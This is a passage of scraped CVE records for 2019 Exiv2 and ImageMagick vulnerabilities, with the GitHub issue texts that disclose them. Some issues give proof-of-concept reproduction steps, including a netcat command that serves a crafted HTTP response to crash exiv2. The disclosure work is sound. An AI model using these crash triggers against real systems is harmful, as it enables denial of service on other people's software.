[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Exiv2/exiv2/issues/845" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Exiv2/exiv2/pull/846" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00004.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FGBT5OD2TF4AIXJUC56WOUJRHAZLZ4DC/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4056-1/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Exiv2/exiv2/issues/845" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Exiv2/exiv2/pull/846" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00004.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FGBT5OD2TF4AIXJUC56WOUJRHAZLZ4DC/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4056-1/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:exiv2:exiv2:*:*:*:*:*:*:*:*", "matchCriteriaId": "4BFA28DF-4BFE-4CA7-A2F7-F471F91B856E", "versionEndExcluding": null, "versionEndIncluding": "0.27.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*", "matchCriteriaId": "97A4B8DF-58DA-4AB6-A1F9-331B36409BA3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*", "matchCriteriaId": "7A5301BF-1402-4BE0-A0F8-69FBE79BC6D6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*", "matchCriteriaId": "07C312A0-CD2C-4B9C-B064-6409B25C278F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "770" ]
770
https://github.com/Exiv2/exiv2/issues/845
[ "Exploit", "Third Party Advisory" ]
github.com
[ "Exiv2", "exiv2" ]
The attached file causes a `std::bad_alloc` exception in `exiv2`. ![issue_845_poc](https://user-images.githubusercontent.com/4358136/57626292-7e38c900-758d-11e9-99aa-85d538eea630.png) The bug is that there is no bounds check on the value of `length` at [pngchunk_int.cpp:669](https://github.com/Exiv2/exiv2/blob/f4a37c63f2f890c16ff7192fc89a75a7c34ae82b/src/pngchunk_int.cpp#L669). Reproducible on the 0.27-maintenance branch ([f4a37c6](https://github.com/Exiv2/exiv2/commit/f4a37c63f2f890c16ff7192fc89a75a7c34ae82b)): ``` exiv2 issue_845_poc.png ```
Out of memory error due to unchecked allocation size in PngChunk::parseChunkContent()
https://api.github.com/repos/Exiv2/exiv2/issues/845/comments
2
2019-05-13T13:42:43Z
2019-07-01T09:04:40Z
https://github.com/Exiv2/exiv2/issues/845
443,405,977
845
463
CVE-2019-13113
2019-06-30T23:15:10.207
Exiv2 through 0.27.1 allows an attacker to cause a denial of service (crash due to assertion failure) via an invalid data location in a CRW image file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Exiv2/exiv2/issues/841" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/Exiv2/exiv2/pull/842" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FGBT5OD2TF4AIXJUC56WOUJRHAZLZ4DC/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4056-1/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Exiv2/exiv2/issues/841" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/Exiv2/exiv2/pull/842" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FGBT5OD2TF4AIXJUC56WOUJRHAZLZ4DC/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4056-1/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:exiv2:exiv2:*:*:*:*:*:*:*:*", "matchCriteriaId": "4BFA28DF-4BFE-4CA7-A2F7-F471F91B856E", "versionEndExcluding": null, "versionEndIncluding": "0.27.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*", "matchCriteriaId": "97A4B8DF-58DA-4AB6-A1F9-331B36409BA3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*", "matchCriteriaId": "7A5301BF-1402-4BE0-A0F8-69FBE79BC6D6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*", "matchCriteriaId": "07C312A0-CD2C-4B9C-B064-6409B25C278F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "617" ]
617
https://github.com/Exiv2/exiv2/issues/841
[ "Exploit", "Third Party Advisory" ]
github.com
[ "Exiv2", "exiv2" ]
The attached file causes an assertion failure in `exiv2`. ![issue_841_poc](https://user-images.githubusercontent.com/4358136/57619635-45452800-757e-11e9-8496-9e198b7f53f4.jpg) Reproducible on the 0.27-maintenance branch ([f4a37c6](https://github.com/Exiv2/exiv2/commit/f4a37c63f2f890c16ff7192fc89a75a7c34ae82b)): ``` exiv2 issue_841_poc.jpg ```
Invalid data location in CRW image causes exiv2 to crash
https://api.github.com/repos/Exiv2/exiv2/issues/841/comments
3
2019-05-13T11:53:23Z
2019-07-01T09:05:47Z
https://github.com/Exiv2/exiv2/issues/841
443,356,775
841
464
CVE-2019-13114
2019-06-30T23:15:10.267
http.c in Exiv2 through 0.27.1 allows a malicious http server to cause a denial of service (crash due to a NULL pointer dereference) by returning a crafted response that lacks a space character.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00009.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/Exiv2/exiv2/issues/793" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/Exiv2/exiv2/pull/815" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00004.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FGBT5OD2TF4AIXJUC56WOUJRHAZLZ4DC/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://support.f5.com/csp/article/K45429077?utm_source=f5support&amp%3Butm_medium=RSS" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4056-1/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00009.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/Exiv2/exiv2/issues/793" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/Exiv2/exiv2/pull/815" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00004.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FGBT5OD2TF4AIXJUC56WOUJRHAZLZ4DC/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://support.f5.com/csp/article/K45429077?utm_source=f5support&amp%3Butm_medium=RSS" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4056-1/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:exiv2:exiv2:*:*:*:*:*:*:*:*", "matchCriteriaId": "4BFA28DF-4BFE-4CA7-A2F7-F471F91B856E", "versionEndExcluding": null, "versionEndIncluding": "0.27.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*", "matchCriteriaId": "97A4B8DF-58DA-4AB6-A1F9-331B36409BA3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*", "matchCriteriaId": "7A5301BF-1402-4BE0-A0F8-69FBE79BC6D6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*", "matchCriteriaId": "07C312A0-CD2C-4B9C-B064-6409B25C278F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/Exiv2/exiv2/issues/793
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "Exiv2", "exiv2" ]
There is a null pointer deference bug at [http.cpp:364](https://github.com/Exiv2/exiv2/blob/55dfdb9ab007d6e6d1d06240048690eaac23b305/src/http.cpp#L364). If the http server sends back a reply that does not contain a space character, then `strchr` will return `NULL`, leading to a null pointer dereference in `atoi`. To reproduce the bug (tested on master: [55dfdb9](https://github.com/Exiv2/exiv2/commit/55dfdb9ab007d6e6d1d06240048690eaac23b305)) open two terminals. In the first terminal, start a fake webserver using [response1.txt](https://github.com/Exiv2/exiv2/files/3113957/response1.txt): ``` cat response1.txt | sudo nc -l -p 80 ``` In the second terminal, try to connect to the fake webserver: ``` exiv2 http://127.0.0.1/test.jpg ``` There are several other calls to `strcat` and `strstr` in the same [block of code](https://github.com/Exiv2/exiv2/blob/55dfdb9ab007d6e6d1d06240048690eaac23b305/src/http.cpp#L339-L396). I have not written PoCs for them, but the calls to `strchr` on lines [351](https://github.com/Exiv2/exiv2/blob/55dfdb9ab007d6e6d1d06240048690eaac23b305/src/http.cpp#L351) and [362](https://github.com/Exiv2/exiv2/blob/55dfdb9ab007d6e6d1d06240048690eaac23b305/src/http.cpp#L362) also look vulnerable to me.
null pointer dereference in http.cpp
https://api.github.com/repos/Exiv2/exiv2/issues/793/comments
4
2019-04-24T20:14:50Z
2019-07-01T09:07:49Z
https://github.com/Exiv2/exiv2/issues/793
436,886,165
793
465
CVE-2019-13133
2019-07-01T20:15:11.180
ImageMagick before 7.0.8-50 has a memory leak vulnerability in the function ReadBMPImage in coders/bmp.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/fe3066122ef72c82415811d25e9e3fad622c0a99" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1600" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/fe3066122ef72c82415811d25e9e3fad622c0a99" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1600" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "F8AB2B06-598F-4F38-813C-B1E3E1E7EEE5", "versionEndExcluding": "7.0.8-50", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "7.0.0-0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "401" ]
401
https://github.com/ImageMagick/ImageMagick/issues/1600
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [ Y ] I have written a descriptive issue title - [ Y ] I have verified that I am using the latest version of ImageMagick - [ Y ] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There are two memory leak issues in ReadBMPImage in coder/bmp.c and ReadVIFFImage in coder/viff.c. There is a patch https://github.com/ImageMagick/ImageMagick/commit/3b48d20df53ad048af05107aa1850c344466b082, which fixed multiple memory leak vulnerabilities. However, the patch for ReadBMPImage is wrong. ``` if (GetNextImageInList(image) == (Image *) NULL) { - image=DestroyImageList(image); + status=MagickFalse; return((Image *) NULL); } ``` Below is the correct logic. ``` if (GetNextImageInList(image) == (Image *) NULL) { - image=DestroyImageList(image); - return((Image *) NULL); + status=MagickFalse; + break; } ``` https://github.com/ImageMagick/ImageMagick/blob/master/coders/bmp.c#L1508 At the same time, there is the same issue in ReadVIFFImage. ``` if (GetNextImageInList(image) == (Image *) NULL) { image=DestroyImageList(image); return((Image *) NULL); } ``` https://github.com/ImageMagick/ImageMagick/blob/master/coders/viff.c#L774 ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: - Environment (Operating system, version and so on): - Additional information: <!-- Thanks for reporting the issue to ImageMagick! -->
Memory leak in ReadBMPImage in coder/bmp.c and ReadVIFFImage in coder/viff.c.
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1600/comments
2
2019-06-18T10:55:16Z
2019-07-03T01:29:51Z
https://github.com/ImageMagick/ImageMagick/issues/1600
457,401,228
1,600
466
CVE-2019-13135
2019-07-01T20:15:11.337
ImageMagick before 7.0.8-50 has a "use of uninitialized value" vulnerability in the function ReadCUTImage in coders/cut.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/cdb383749ef7b68a38891440af8cc23e0115306d" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1599" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick6/commit/1e59b29e520d2beab73e8c78aacd5f1c0d76196d" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2019/08/msg00021.html" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/09/msg00007.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://support.f5.com/csp/article/K20336394" }, { "source": "cve@mitre.org", "tags": null, "url": "https://support.f5.com/csp/article/K20336394?utm_source=f5support&amp%3Butm_medium=RSS" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4192-1/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/cdb383749ef7b68a38891440af8cc23e0115306d" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1599" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick6/commit/1e59b29e520d2beab73e8c78aacd5f1c0d76196d" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2019/08/msg00021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/09/msg00007.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://support.f5.com/csp/article/K20336394" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://support.f5.com/csp/article/K20336394?utm_source=f5support&amp%3Butm_medium=RSS" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4192-1/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "BF97F7CB-3E80-4DBB-8854-FF5C012BA0FA", "versionEndExcluding": "6.9.10-50", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "F8AB2B06-598F-4F38-813C-B1E3E1E7EEE5", "versionEndExcluding": "7.0.8-50", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "7.0.0-0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "matchCriteriaId": "F7016A2A-8365-4F1A-89A2-7A19F2BCAE5B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, 